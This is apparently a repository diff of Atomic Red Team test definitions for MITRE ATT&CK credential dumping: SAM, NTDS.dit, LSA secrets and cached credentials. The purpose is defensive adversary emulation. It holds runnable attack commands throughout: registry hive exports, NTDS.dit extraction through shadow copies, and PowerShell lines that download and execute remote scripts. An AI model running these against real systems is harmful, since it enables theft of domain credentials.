**auto_generated_guid:** 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
#### Attack Commands: Run with `powershell`!
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
```
### Atomic Test #8: Dumping of SAM, creds, and secrets(Reg Export)
<br/>
<br/>
## Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
**Supported Platforms:** Windows
**auto_generated_guid:** `21df41be-cdd8-4695-a650-c3981113aa3c`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 21df41be-cdd8-4695-a650-c3981113aa3c
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg export HKLM\sam %temp%\sam
@@ -284,10 +371,15 @@ reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
```
<br/>
atomics/T1003.003/T1003.003.md
+197 -178
View File
@@ -1,75 +1,92 @@
# T1003.003 - OS Credential Dumping: NTDS
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/003)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
> Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
>
> In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
>
> The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
>
> * Volume Shadow Copy
> * secretsdump.py
> * Using the in-built Windows tool, ntdsutil.exe
> * Invoke-NinjaCopy
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
[Source](https://attack.mitre.org/techniques/T1003/003)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
</blockquote>
## Atomic Tests
- [Atomic Test #1: Create Volume Shadow Copy with vssadmin](#atomic-test-1-create-volume-shadow-copy-with-vssadmin)
- [Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy](#atomic-test-2-copy-ntdsdit-from-volume-shadow-copy)
- [Atomic Test #3: Dump Active Directory Database with NTDSUtil](#atomic-test-3-dump-active-directory-database-with-ntdsutil)
- [Atomic Test #4: Create Volume Shadow Copy with WMI](#atomic-test-4-create-volume-shadow-copy-with-wmi)
- [Atomic Test #5: Create Volume Shadow Copy remotely with WMI](#atomic-test-5-create-volume-shadow-copy-remotely-with-wmi)
- [Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl](#atomic-test-6-create-volume-shadow-copy-remotely-wmi-with-esentutl)
- [Atomic Test #7: Create Volume Shadow Copy with Powershell](#atomic-test-7-create-volume-shadow-copy-with-powershell)
- [Atomic Test #8: Create Symlink to Volume Shadow Copy](#atomic-test-8-create-symlink-to-volume-shadow-copy)
- [Atomic Test #9: Create Volume Shadow Copy with diskshadow](#atomic-test-9-create-volume-shadow-copy-with-diskshadow)
- [Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing](#atomic-test-10-copy-ntds-in-low-level-ntfs-acquisition-via-mft-parsing)
- [Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil](#atomic-test-11-copy-ntds-in-low-level-ntfs-acquisition-via-fsutil)
- [Atomic Test #1 - Create Volume Shadow Copy with vssadmin](#atomic-test-1---create-volume-shadow-copy-with-vssadmin)
### Atomic Test #1: Create Volume Shadow Copy with vssadmin
- [Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-2---copy-ntdsdit-from-volume-shadow-copy)
- [Atomic Test #3 - Dump Active Directory Database with NTDSUtil](#atomic-test-3---dump-active-directory-database-with-ntdsutil)
- [Atomic Test #4 - Create Volume Shadow Copy with WMI](#atomic-test-4---create-volume-shadow-copy-with-wmi)
- [Atomic Test #5 - Create Volume Shadow Copy remotely with WMI](#atomic-test-5---create-volume-shadow-copy-remotely-with-wmi)
- [Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl](#atomic-test-6---create-volume-shadow-copy-remotely-wmi-with-esentutl)
- [Atomic Test #7 - Create Volume Shadow Copy with Powershell](#atomic-test-7---create-volume-shadow-copy-with-powershell)
- [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy)
- [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)
<br/>
## Atomic Test #1 - Create Volume Shadow Copy with vssadmin
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** `dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f`
#### Inputs
**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | string | C:|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe create shadow /for=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
### Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy
<br/>
<br/>
## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -80,16 +97,22 @@ This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
**auto_generated_guid:** `c6237146-9ea6-4711-85c9-c56d263a6b03`
#### Inputs
**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vsc_name | Name of Volume Shadow Copy | string | &#92;&#92;?&#92;GLOBALROOT&#92;Device&#92;HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | path | C:&#92;Windows&#92;Temp|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
@@ -97,60 +120,51 @@ copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del "#{extract_path}\ntds.dit" >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
##### Description: Volume shadow copy must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
if not exist #{vsc_name} (exit /b 1)
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'" to fulfill this requirement
```
##### Description: Extract path must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
if not exist #{extract_path} (exit /b 1)
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
mkdir #{extract_path}
```
### Atomic Test #3: Dump Active Directory Database with NTDSUtil
<br/>
<br/>
## Atomic Test #3 - Dump Active Directory Database with NTDSUtil
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
@@ -161,290 +175,295 @@ Upon successful completion, you will find a copy of the ntds.dit file in the C:\
**Supported Platforms:** Windows
**auto_generated_guid:** `2364e33d-ceab-4641-8468-bfb1d7cc2723`
#### Inputs
**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;ntds_T1003|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
rmdir /q /s #{output_folder} >nul 2>&1
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
### Atomic Test #4: Create Volume Shadow Copy with WMI
<br/>
<br/>
## Atomic Test #4 - Create Volume Shadow Copy with WMI
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** `224f7de0-8f0a-4a94-b5d8-989b036c86da`
#### Inputs
**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon and backslash) | string | C:&#92;|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic shadowcopy call create Volume=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
### Atomic Test #5: Create Volume Shadow Copy remotely with WMI
<br/>
<br/>
## Atomic Test #5 - Create Volume Shadow Copy remotely with WMI
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** `d893459f-71f0-484d-9808-ec83b2b64226`
#### Inputs
**auto_generated_guid:** d893459f-71f0-484d-9808-ec83b2b64226
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon and backslash) | string | C:&#92;|
| target_host | IP Address / Hostname you want to target | string | localhost|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
wmic /node:"#{target_host}" shadowcopy list brief
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
```
### Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl
<br/>
<br/>
## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
**Supported Platforms:** Windows
**auto_generated_guid:** `21c7bf80-3e8b-40fa-8f9d-f5b194ff2865`
#### Inputs
**auto_generated_guid:** 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| source_path | File to shadow copy | string | c:&#92;windows&#92;ntds&#92;ntds.dit|
| target_path | Target path of the result file | string | c:&#92;ntds.dit|
| target_host | IP Address / Hostname you want to target | string | localhost|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
```
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
###### Check Prereq Commands
##### Check Prereq Commands:
```cmd
wmic /node:"#{target_host}" shadowcopy list brief
```
###### Get Prereq Commands
##### Get Prereq Commands:
```cmd
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
```
### Atomic Test #7: Create Volume Shadow Copy with Powershell
<br/>
<br/>
## Atomic Test #7 - Create Volume Shadow Copy with Powershell
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** `542bb97e-da53-436b-8e43-e0a7d31a6c24`
#### Inputs
**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | string | C:&#92;|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')
```
### Atomic Test #8: Create Symlink to Volume Shadow Copy
<br/>
<br/>
## Atomic Test #8 - Create Symlink to Volume Shadow Copy
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
**Supported Platforms:** Windows
**auto_generated_guid:** `21748c28-2793-4284-9e07-d6d028b66702`
#### Inputs
**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | string | C:|
| symlink_path | symlink path | string | C:&#92;Temp&#92;vssstore|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
```
### Atomic Test #9: Create Volume Shadow Copy with diskshadow
<br/>
<br/>
## Atomic Test #9 - Create Volume Shadow Copy with diskshadow
This test is intended to be run on a domain controller
An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
**Supported Platforms:** Windows
**auto_generated_guid:** `b385996c-0e7d-4e27-95a4-aca046b119a7`
#### Inputs
**auto_generated_guid:** b385996c-0e7d-4e27-95a4-aca046b119a7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | Location of the script | Path | PathToAtomicsFolder&#92;T1003.003&#92;src&#92;diskshadow.txt|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
mkdir c:\exfil
diskshadow.exe /s #{filename}
```
### Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
**Supported Platforms:** Windows
**auto_generated_guid:** `f57cb283-c131-4e2f-8a6c-363d575748b2`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| extract_path | Path for extracted NTDS.dit | string | C:&#92;Windows&#92;Temp|
| script_url | URL to UnderlayCopy script | url | https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
```
#### Cleanup Commands
```powershell
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
```
### Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
**Supported Platforms:** Windows
**auto_generated_guid:** `c7be89f7-5d06-4321-9f90-8676a77e0502`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| extract_path | Path for extracted NTDS.dit | string | C:&#92;Windows&#92;Temp|
| script_url | URL to UnderlayCopy script | url | https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
```
#### Cleanup Commands
```powershell
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
```
<br/>
atomics/T1003.003/T1003.003.yaml
-57
View File
@@ -261,60 +261,3 @@ atomic_tests:
diskshadow.exe /s #{filename}
name: command_prompt
elevation_required: true
- name: Copy NTDS in low level NTFS acquisition via MFT parsing
auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
- name: Copy NTDS in low level NTFS acquisition via fsutil
auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
atomics/T1003.004/T1003.004.md
+46 -23
View File
@@ -1,20 +1,23 @@
# T1003.004 - OS Credential Dumping: LSA Secrets
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/004)
<blockquote>
## Description from ATT&CK
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
> Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
>
> [Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)
[Source](https://attack.mitre.org/techniques/T1003/004)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Dumping LSA Secrets](#atomic-test-1-dumping-lsa-secrets)
- [Atomic Test #2: Dump Kerberos Tickets from LSA using dumper.ps1](#atomic-test-2-dump-kerberos-tickets-from-lsa-using-dumperps1)
- [Atomic Test #1 - Dumping LSA Secrets](#atomic-test-1---dumping-lsa-secrets)
### Atomic Test #1: Dumping LSA Secrets
- [Atomic Test #2 - Dump Kerberos Tickets from LSA using dumper.ps1](#atomic-test-2---dump-kerberos-tickets-from-lsa-using-dumperps1)
<br/>
## Atomic Test #1 - Dumping LSA Secrets
Dump secrets key from Windows registry
When successful, the dumped file will be written to $env:Temp\secrets.
Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
@@ -22,38 +25,40 @@ https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%2
**Supported Platforms:** Windows
**auto_generated_guid:** `55295ab0-a703-433b-9ca4-ae13807de12f`
#### Inputs
**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| psexec_exe | Path to PsExec executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;T1003.004&#92;bin&#92;PsExec.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{psexec_exe}" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del %temp%\secrets >nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{psexec_exe}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PSTools" -Force
@@ -61,8 +66,13 @@ New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe" "#{psexec_exe}" -Force
```
### Atomic Test #2: Dump Kerberos Tickets from LSA using dumper.ps1
<br/>
<br/>
## Atomic Test #2 - Dump Kerberos Tickets from LSA using dumper.ps1
This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type.
If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session.
Ref: https://github.com/MzHmO/PowershellKerberos/
@@ -70,11 +80,24 @@ Author of dumper.ps1: Michael Zhmaylo (@MzHmO)
**Supported Platforms:** Windows
**auto_generated_guid:** `2dfa3bff-9a27-46db-ab75-7faefdaca732`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 2dfa3bff-9a27-46db-ab75-7faefdaca732
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1')
```
<br/>
atomics/T1003.005/T1003.005.md
+30 -15
View File
@@ -1,25 +1,27 @@
# T1003.005 - OS Credential Dumping: Cached Domain Credentials
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/005)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
> Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
>
> On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
>
> On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix)
>
> With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)
>
> Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
[Source](https://attack.mitre.org/techniques/T1003/005)
